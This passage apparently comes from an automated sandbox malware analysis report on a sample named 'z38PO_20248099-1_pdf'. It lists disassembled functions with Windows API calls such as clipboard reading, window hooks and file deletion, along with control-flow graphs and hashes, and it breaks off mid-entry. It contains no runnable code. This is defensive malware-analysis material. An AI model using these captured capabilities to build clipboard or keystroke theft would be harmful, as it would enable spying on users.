                                • Instruction ID: ec6ffacc6cc975354529c934f03024588cb8327f9c69bcab7d047452d5708478
                                • Opcode Fuzzy Hash: fc23304999e1f2b1ca573581839b2b7bc8c9be21caee68c95b697df2c3f92444
                                • Instruction Fuzzy Hash: 74415CB4900309DFDB54CF99C448AAABBF5FF88314F14C55AD519AB361D374A885CFA0
                                Function 064AB290 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 901 64ab290-64ab908 OleGetClipboard 904 64ab90a-64ab910 901->904 905 64ab911-64ab95f 901->905 904->905 910 64ab96f 905->910 911 64ab961-64ab965 905->911 913 64ab970 910->913 911->910 912 64ab967 911->912 912->910 913->913
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: c8f0b84f64ba25a5ff18768b8eb304c5ca4fbc27b290cee3e0f4174458a35137
                                • Instruction ID: 8188d82270b768799804f7d24a636f2d22defd361d913824da54d031dc872e38
                                • Opcode Fuzzy Hash: c8f0b84f64ba25a5ff18768b8eb304c5ca4fbc27b290cee3e0f4174458a35137
                                • Instruction Fuzzy Hash: D331D2B0D01349EFDB60DF99C984B9EBBF5EB58314F20801AE404AB394D775A845CB95
                                Function 064AB872 Relevance: 1.6, APIs: 1, Instructions: 70comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 914 64ab872-64ab8c0 915 64ab8ca-64ab908 OleGetClipboard 914->915 916 64ab90a-64ab910 915->916 917 64ab911-64ab95f 915->917 916->917 922 64ab96f 917->922 923 64ab961-64ab965 917->923 925 64ab970 922->925 923->922 924 64ab967 923->924 924->922 925->925
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 8dd073334c62adaf343100c4f8fd56dea9cc3261d36f3fa214fb712b5dc65e61
                                • Instruction ID: 73511c32c3c1570bcb363bc4c5eea2aaa8e59a17660c0437ee3730c93858614a
                                • Opcode Fuzzy Hash: 8dd073334c62adaf343100c4f8fd56dea9cc3261d36f3fa214fb712b5dc65e61
                                • Instruction Fuzzy Hash: 0331EDB0D01349EFEB60CF99C984BDEBBF5EB58314F20801AE404AB394D7B5A849CB55
                                Function 064A9C90 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 926 64a9c90-64a9c95 927 64a9c98-64a9d2c DuplicateHandle 926->927 928 64a9d2e-64a9d34 927->928 929 64a9d35-64a9d52 927->929 928->929
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 064A9D1F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: fbef74562d4eb613d66fa7206eb8229bf53b75ae442db81081d962ffe528c0aa
                                • Instruction ID: 387aebf2ec88fdb641ee3474051182ef42cbcbd24767a787f5cfc3e91e435351
                                • Opcode Fuzzy Hash: fbef74562d4eb613d66fa7206eb8229bf53b75ae442db81081d962ffe528c0aa
                                • Instruction Fuzzy Hash: 982105B5800349AFDB10CF9AD484ADEFBF4FB48310F14841AE958A7350D378A944CFA0
                                Function 064A9C98 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 932 64a9c98-64a9d2c DuplicateHandle 933 64a9d2e-64a9d34 932->933 934 64a9d35-64a9d52 932->934 933->934
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 064A9D1F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 9484d22fe5a07b37d1044d263cb004e07919c0f445d58121fd1d4f22bfb3e70c
                                • Instruction ID: ea3dab82dafb40fd5487fabf2c9f4bfb90c05ef3bccc929c16b2fc762d269f6c
                                • Opcode Fuzzy Hash: 9484d22fe5a07b37d1044d263cb004e07919c0f445d58121fd1d4f22bfb3e70c
                                • Instruction Fuzzy Hash: D021E4B5900309AFDB10CF9AD884ADEBBF4EB48310F14841AE918A7350D378A944CFA4
                                Function 02658038 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 937 2658038-265808a 939 2658092-26580bd DeleteFileW 937->939 940 265808c-265808f 937->940 942 26580c6-26580ee 939->942 943 26580bf-26580c5 939->943 940->939 943->942
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 026580B0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 1e2b791896bda04a5e03986d312bfcd289b03e78867df2c072ed8d453128d155
                                • Instruction ID: 60a389e958d26e205ea9d30e55a0418a4f9bbc7aab07ef7130f30395297ea345
                                • Opcode Fuzzy Hash: 1e2b791896bda04a5e03986d312bfcd289b03e78867df2c072ed8d453128d155
                                • Instruction Fuzzy Hash: D22127B6C0065A9BCB20CF9AD545B9EFBB0AF48310F14816AD858B7750D378A944CFA1
                                Function 064AD3A8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 946 64ad3a8-64ad3fa 948 64ad3fc-64ad404 946->948 949 64ad406-64ad438 SetWindowsHookExA 946->949 948->949 950 64ad43a-64ad440 949->950 951 64ad441-64ad461 949->951 950->951
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 064AD42B
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: 010a8dfa16a97b5795f3a7f81d42aaf2a8a8f470bdaba19212b594c48e1ecaf1
                                • Instruction ID: 2e2aa3882c3d701baaa3067eb59ec73183ccba2a91cd555c751554d3c4b2904b
                                • Opcode Fuzzy Hash: 010a8dfa16a97b5795f3a7f81d42aaf2a8a8f470bdaba19212b594c48e1ecaf1
                                • Instruction Fuzzy Hash: CB2113B5D002099FDB54CFAAD844BEEFBF5EF88310F14842AE459A7650C774A944CFA1
                                Function 064AD3B0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 955 64ad3b0-64ad3fa 957 64ad3fc-64ad404 955->957 958 64ad406-64ad438 SetWindowsHookExA 955->958 957->958 959 64ad43a-64ad440 958->959 960 64ad441-64ad461 958->960 959->960
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 064AD42B
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: 0c11b7b5eea166c6a7837acd5c2ec70323f42656042b9e3d20add7a415845bd6
                                • Instruction ID: c15dcb5cf91c3b85e88109e0ab89cf5eeba6b1fd98dbad89134080adc3188abc
                                • Opcode Fuzzy Hash: 0c11b7b5eea166c6a7837acd5c2ec70323f42656042b9e3d20add7a415845bd6
                                • Instruction Fuzzy Hash: D12122B1D002099FDB54CFAAD844BEEFBF5EF88310F10842AE419A7250C778A944CFA1
                                Function 02658040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 964 2658040-265808a 966 2658092-26580bd DeleteFileW 964->966 967 265808c-265808f 964->967 969 26580c6-26580ee 966->969 970 26580bf-26580c5 966->970 967->966 970->969
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 026580B0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: bf485f38686701613e15a3c3e49d1a004e2553ef49d58d953afaf9decf224f28
                                • Instruction ID: 565defccd251d7414edeea92ef4137559fb8ddef44f2c111de6c9f7fed2742aa
                                • Opcode Fuzzy Hash: bf485f38686701613e15a3c3e49d1a004e2553ef49d58d953afaf9decf224f28
                                • Instruction Fuzzy Hash: DF1136B1C0065A9BCB10CF9AD54479EFBF4FF48320F14816AD818A7740D378A944CFA5
                                Function 0265EF78 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 0265EFDF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 13bd5a87a16e0a7d50a47febf59e5a66aa328a504a3608e4b4988bbdbc136446
                                • Instruction ID: 190e14f4c4f05085f50ade19999c4d0e41925522fe6de0a66d082df4d9239deb
                                • Opcode Fuzzy Hash: 13bd5a87a16e0a7d50a47febf59e5a66aa328a504a3608e4b4988bbdbc136446
                                • Instruction Fuzzy Hash: 271126B1C0065A9BDB10CF9AC544BDEFBF4EF48310F14816AE818A7240D778A944CFE5
                                Function 064A3624 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 064A4D56
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 3ebb6ece6fc5679d6ab63fcd45addb5023ce4f249494a342fbd29c018fa24fe8
                                • Instruction ID: f1d2efa145a245b9cf9dc2b1be8ee6490dd7c37a79bf734d0f3014577d656967
                                • Opcode Fuzzy Hash: 3ebb6ece6fc5679d6ab63fcd45addb5023ce4f249494a342fbd29c018fa24fe8
                                • Instruction Fuzzy Hash: 081120B5C003499FDB20DF9AC444B9EFBF4EB88210F10842AD829B7210C3B9A505CFA1
                                Function 064A4CEA Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 064A4D56
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: d8dccecafaf627ac86ccdb9a02be4a47b7aa8d34d45b9aa314a150901f627be8
                                • Instruction ID: 053679763dd1b82312973004498e70a80d45e3b276643411b6a198b9a8051732
                                • Opcode Fuzzy Hash: d8dccecafaf627ac86ccdb9a02be4a47b7aa8d34d45b9aa314a150901f627be8
                                • Instruction Fuzzy Hash: E211F0B9C002499FDB10DF9AC444ADEFBF4AB89214F14842AD469B7710C379A546CFA1
                                Function 064AAE58 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,064AAE35), ref: 064AAEBF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: faddc485ae1935740a029451ee3e77e406449e7b5c37dba0cb761d4d14b9bf41
                                • Instruction ID: c387fff01f49cd3a60942a5cd8a8272c18a5501749b816be2dc63cc6e7e7f9a8
                                • Opcode Fuzzy Hash: faddc485ae1935740a029451ee3e77e406449e7b5c37dba0cb761d4d14b9bf41
                                • Instruction Fuzzy Hash: 4E11F5B58003499FDB20DF9AD845BDFBBF4EB48314F20841AE519A7650C375A944CFA5
                                Function 064AB170 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 064AB77D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: f6a4045c20836cbd9cf51152ad70a60f74c8df33b70e37ccbdb8f185938e6eea
                                • Instruction ID: 7393b2ea1021fd354db62cbfb517fde91cca445830dbe3616d18b16969d05625
                                • Opcode Fuzzy Hash: f6a4045c20836cbd9cf51152ad70a60f74c8df33b70e37ccbdb8f185938e6eea
                                • Instruction Fuzzy Hash: 3B1155B5C003488FCB10EF9AD485BDEBBF8EB48214F20845AD418A7310C379A945CFA5
                                Function 064AB178 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 064AB77D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 587f08037d2e9f20f298c5ea4f1a1283dd2c667ff586466d679158d2e367f447
                                • Instruction ID: 8c9bbfaf5715feb13840cd46ab5140e0e7ba3c91ba1289debf53d5b022f5b46d
                                • Opcode Fuzzy Hash: 587f08037d2e9f20f298c5ea4f1a1283dd2c667ff586466d679158d2e367f447
                                • Instruction Fuzzy Hash: E41145B4800348CFDB20EF9AD448BDEBBF4EB48210F20845AD518A7300C3B9A944CFA5
                                Function 064A98CC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,064AAE35), ref: 064AAEBF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 55f2377e5097ea4be71d737e192144ed277c141eb6a658c0fe81dec737a135ab
                                • Instruction ID: 43082653cd8e13679247fe005355f6202c33e706a1c5a82f1dc0cfe43641328e
                                • Opcode Fuzzy Hash: 55f2377e5097ea4be71d737e192144ed277c141eb6a658c0fe81dec737a135ab
                                • Instruction Fuzzy Hash: 631130B58003498FDB60DF9AD448B9FBBF4EB48320F20841AE919A7340C378A944CFA4
                                Function 064AB721 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 064AB77D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: c6aa95c3ceae898c5b3759137853e02f7e8df9db28306c8d043141d48177bccd
                                • Instruction ID: aa0243e556315035bd9b6a1d1e92607be7d995536a833176c00d23cd5eeb91db
                                • Opcode Fuzzy Hash: c6aa95c3ceae898c5b3759137853e02f7e8df9db28306c8d043141d48177bccd
                                • Instruction Fuzzy Hash: 9A1145B98003498FCB20DF9AD484BDEBFF4EB48210F20845AD558A7300C379A544CFA5
                                Function 064CD068 Relevance: .8, Instructions: 799COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f9f717aa0f2a2840f19189eac295f4c9128537695fc766a0e00c555d4db067b
                                • Instruction ID: 2b7b9344e3f6ffa8aec76ae2fc9bd17d2bf3de406f87c9227bea973930404868
                                • Opcode Fuzzy Hash: 5f9f717aa0f2a2840f19189eac295f4c9128537695fc766a0e00c555d4db067b
                                • Instruction Fuzzy Hash: 4D627C38A006098FDB65EF68D590A9EB7F2FF84310F218A69D0059F758DB71EC46CB91
                                Function 064CC2A8 Relevance: .6, Instructions: 645COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d13f2963c79bde7c964a5b039cae004ecdebf589dc0046b9afc488d36d5558a0
                                • Instruction ID: 280496f7110de4274469f3fd5efcb2b779771d2d9b1690d5e711c63f30ecd8e3
                                • Opcode Fuzzy Hash: d13f2963c79bde7c964a5b039cae004ecdebf589dc0046b9afc488d36d5558a0
                                • Instruction Fuzzy Hash: 64329338F006059FDB95DB68D890BAEB7B2FB88320F20856AD409E7754DB35DC46CB91
                                Function 064CB760 Relevance: .5, Instructions: 470COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1aaf69b5fc7ec7f2228193d451ce9c33be4fe8ca1ea6cb7cfd1a782c55bc68a
                                • Instruction ID: 3b0afc210c45d5cf69a96df7bf33259bd79f5442af0199fcb408bd699c9ee4aa
                                • Opcode Fuzzy Hash: e1aaf69b5fc7ec7f2228193d451ce9c33be4fe8ca1ea6cb7cfd1a782c55bc68a
                                • Instruction Fuzzy Hash: 16027C38E102198FDBA5DFA8D481AAEB7F2FB85320F20856AD415EB355DB31DC41CB91
                                Function 064CADE0 Relevance: .4, Instructions: 391COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 91de61225f786d053423a7479729082aa14b73f7edc6d8f5f5ba3107da10782b
                                • Instruction ID: 95cfcdb8d621ea92dadcafac68517860942a767d94878b67b0e06897bfb59198
                                • Opcode Fuzzy Hash: 91de61225f786d053423a7479729082aa14b73f7edc6d8f5f5ba3107da10782b
                                • Instruction Fuzzy Hash: DCE17034F106098FDBA5DBA9D4906AEB7B2FF89310F20852ED406AB354DB70DC46CB91
                                Function 06BB2148 Relevance: .4, Instructions: 350COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cda367f0d60db30367f5a35facbed8f1a1a537df007489ab31a441ea3afef820
                                • Instruction ID: c2ff4eccaaba28e2188bf0a48938540eab85139f1cd8d47c9c6cea9ca9b565c6
                                • Opcode Fuzzy Hash: cda367f0d60db30367f5a35facbed8f1a1a537df007489ab31a441ea3afef820
                                • Instruction Fuzzy Hash: 03D19C70E003099FDB54DFA9C8546EEBBF2EF88310F149569E505AB390DBB49941CBA1
                                Function 064C9260 Relevance: .2, Instructions: 231COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6563685f048aba60cc489532769d25d61618ee9a7170ebeab414e46e034881b
                                • Instruction ID: 6e68d7885bc41212dfd101ce622cb83c1d5b433bec007a1a982252b1a9ea5328
                                • Opcode Fuzzy Hash: f6563685f048aba60cc489532769d25d61618ee9a7170ebeab414e46e034881b
                                • Instruction Fuzzy Hash: 17913174F506099FDB94DB69D8607AE7BB2BB88310F5085AAC409EB348EF709D418B91
                                Function 064C6300 Relevance: .2, Instructions: 229COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5bef7507a878dfe1ba6ab5d9525ae8bff92a3e5391816e072b1cf3cfa57d8726
                                • Instruction ID: 829aabfcc29f09feae77546fa315effa4c58e0d4302e48a5fe0f5bc9dec28bd1
                                • Opcode Fuzzy Hash: 5bef7507a878dfe1ba6ab5d9525ae8bff92a3e5391816e072b1cf3cfa57d8726
                                • Instruction Fuzzy Hash: 7B61A1B5F001104FDB519BAEC88066FAAE7AFC4620B25847AD80ADB360DF75EC0287D1
                                Function 064C43B2 Relevance: .2, Instructions: 228COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4ed0801ee6c5cd90d99386d3b92854a6399cc5a88e982e77b6f726840ead38a
                                • Instruction ID: 1d17c0194ee08d11d9033fa9df965fe797c5ddffa136c128d97ad0b688139bdd
                                • Opcode Fuzzy Hash: a4ed0801ee6c5cd90d99386d3b92854a6399cc5a88e982e77b6f726840ead38a
                                • Instruction Fuzzy Hash: BA816E74B006098FDB95DFB8D5A079EBBF2BB89310F208529D509DB354EB35DC428B91
                                Function 064C46CC Relevance: .2, Instructions: 217COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de294bf68dc1a8904d781a9eec3c1b41d314a67b0202750885138e6253828714
                                • Instruction ID: 5579e2a8b164a9d91e1103aa0614b2c3e98728ca95435312604508a5af39cdf2
                                • Opcode Fuzzy Hash: de294bf68dc1a8904d781a9eec3c1b41d314a67b0202750885138e6253828714
                                • Instruction Fuzzy Hash: 57914C34E102198BDB61DF68C890B9DB7B1FF89310F20869AD549BB385DB70AA85CF51
                                Function 064C46E0 Relevance: .2, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b42f64a80a1ff7e910775c4f71f5cd5810fa013a1ec085307d06ca6d9a0bbaf7
                                • Instruction ID: edb1c66636b2d36f7ac25ff6b770802b4c314b8a29d8f7a77845dcbe979a5181
                                • Opcode Fuzzy Hash: b42f64a80a1ff7e910775c4f71f5cd5810fa013a1ec085307d06ca6d9a0bbaf7
                                • Instruction Fuzzy Hash: DF914034E106198BDF61DF68C990B9DB7B1FF89310F20859AD549BB384DB70A985CF50
                                Function 064CF031 Relevance: .2, Instructions: 207COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8024fa69d036377039b294ba10568d9c033d925c5ccc30b6dd4f44832bad164d
                                • Instruction ID: 8c63e54507da04f0b54f83f3e7535053c047bbfcc95198c7c72989d1c040e20b
                                • Opcode Fuzzy Hash: 8024fa69d036377039b294ba10568d9c033d925c5ccc30b6dd4f44832bad164d
                                • Instruction Fuzzy Hash: ED717D34A002089FDB94DFA9D990A9EBBF6FF88310F24856AD405AB354DB35EC46CB50
                                Function 064CF040 Relevance: .2, Instructions: 201COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0de18f4b45ad76c07319c31f9e331ce7fc03217d9388e5163961820cfe371a0
                                • Instruction ID: fbf41aed08f0119ae2c6179b699a70c264d23f7d20bc9599a3d0d06911bc2709
                                • Opcode Fuzzy Hash: b0de18f4b45ad76c07319c31f9e331ce7fc03217d9388e5163961820cfe371a0
                                • Instruction Fuzzy Hash: CB715A34A002089FDB94DFA9D990A9EBBF6FF88310F24846AD405AB354DB34EC46CB50
                                Function 064C4C78 Relevance: .2, Instructions: 186COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
